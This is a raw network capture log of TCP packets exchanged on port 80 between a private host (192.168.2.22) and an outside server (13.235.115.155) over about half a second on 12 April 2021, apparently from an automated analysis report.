Apr 12, 2021 08:02:44.687153101 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687171936 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687175989 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687201023 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687202930 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687225103 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687233925 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687251091 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687261105 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687273979 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687290907 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687299013 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687321901 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687321901 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687345982 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687352896 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687367916 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687386036 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687388897 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687410116 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687411070 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687433958 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687441111 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687455893 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687474012 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687482119 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687504053 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687505960 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687529087 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687530041 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687561035 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687715054 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.849289894 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.849349022 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.849409103 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.849455118 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.849476099 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.849500895 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.849502087 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.849524021 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.849540949 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.849544048 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.849580050 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.849591970 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.849618912 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.849633932 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.849667072 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.850862980 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.850903034 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.850940943 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.850960016 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.850974083 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.850995064 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.850995064 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851039886 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851044893 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851079941 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851092100 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851116896 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851130962 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851154089 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851161957 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851192951 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851203918 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851233006 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851243973 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851270914 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851277113 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851310968 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851329088 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851344109 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851352930 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851393938 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851421118 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851432085 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851444960 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851450920 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851465940 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851470947 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851510048 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851531982 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851545095 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851556063 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851582050 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851594925 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851617098 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851619005 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851658106 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851669073 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851699114 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851711988 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851737022 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851747990 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851775885 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851777077 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851815939 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851830006 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851855040 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851867914 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851892948 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851900101 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851931095 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851943970 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.851972103 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.851974964 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852010965 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852020979 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852050066 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852062941 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852085114 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852089882 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852129936 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852140903 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852169991 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852180004 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852207899 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852219105 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852243900 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852257967 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852288961 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852293968 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852329969 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852340937 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852366924 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852379084 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852406025 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.852418900 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.852456093 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.854176044 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.011847973 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.011895895 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.011921883 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.011945963 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.011967897 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.011987925 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.012011051 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.012027025 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.012036085 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.012062073 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.012065887 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.012073040 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.015247107 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015290022 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015312910 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015336037 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015362024 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015367031 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.015388012 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015389919 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.015398979 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.015413046 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015422106 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.015438080 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015448093 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.015461922 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015470028 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.015486956 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015496969 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.015511990 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015522957 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.015535116 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.015543938 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.015568972 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016099930 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016134977 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016160011 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016184092 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016196966 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016207933 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016237020 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016237974 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016263008 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016268969 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016289949 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016299963 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016316891 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016329050 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016343117 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016366959 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016376019 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016393900 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016410112 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016418934 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016447067 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016449928 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016473055 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016478062 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016498089 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016505957 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016522884 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016535997 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016546965 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016571045 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016571045 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016581059 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016597986 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016613007 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016622066 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016649008 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016659021 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016676903 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016690016 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016701937 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016729116 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016729116 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016745090 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016756058 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016781092 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016782999 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016805887 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.016808987 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016844034 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.016853094 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.023176908 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.025103092 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174411058 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174460888 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174494982 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174527884 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174561024 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174592972 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174597025 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174616098 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174621105 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174633026 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174668074 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174673080 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174702883 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174705029 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174709082 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174737930 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174768925 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174797058 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174818039 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174827099 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174830914 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174844027 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174865961 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174889088 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174901009 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174911976 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174933910 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.174947023 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.174978018 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.177555084 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177597046 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177630901 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177664995 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177701950 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177726030 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.177736998 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177757978 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.177769899 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177795887 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.177805901 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177839994 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177876949 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177902937 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177913904 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.177928925 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177963972 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.177999020 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178030968 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178066015 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178100109 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178133965 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178138018 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.178167105 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178190947 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.178206921 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178220034 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.178244114 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178256035 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.178278923 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178286076 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.178313971 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178343058 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.178349018 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.178359985 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.178385973 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179147005 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179191113 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179224968 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179255009 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179260015 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179269075 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179295063 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179305077 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179336071 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179342985 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179373980 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179384947 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179408073 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179418087 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179444075 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179455042 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179480076 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179490089 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179514885 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179517984 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179553032 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179563999 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179588079 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179600954 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179626942 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179631948 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179666042 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179682970 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179703951 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179722071 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179738998 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179757118 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179775000 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179792881 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179809093 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179826975 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179845095 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179856062 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179879904 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179891109 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179919958 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179924011 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.179955959 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.179989100 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.180022001 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.180041075 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.180077076 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.180093050 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.180109024 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.180131912 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.180141926 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.180151939 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.180176020 CEST	80	49167	13.235.115.155	192.168.2.22
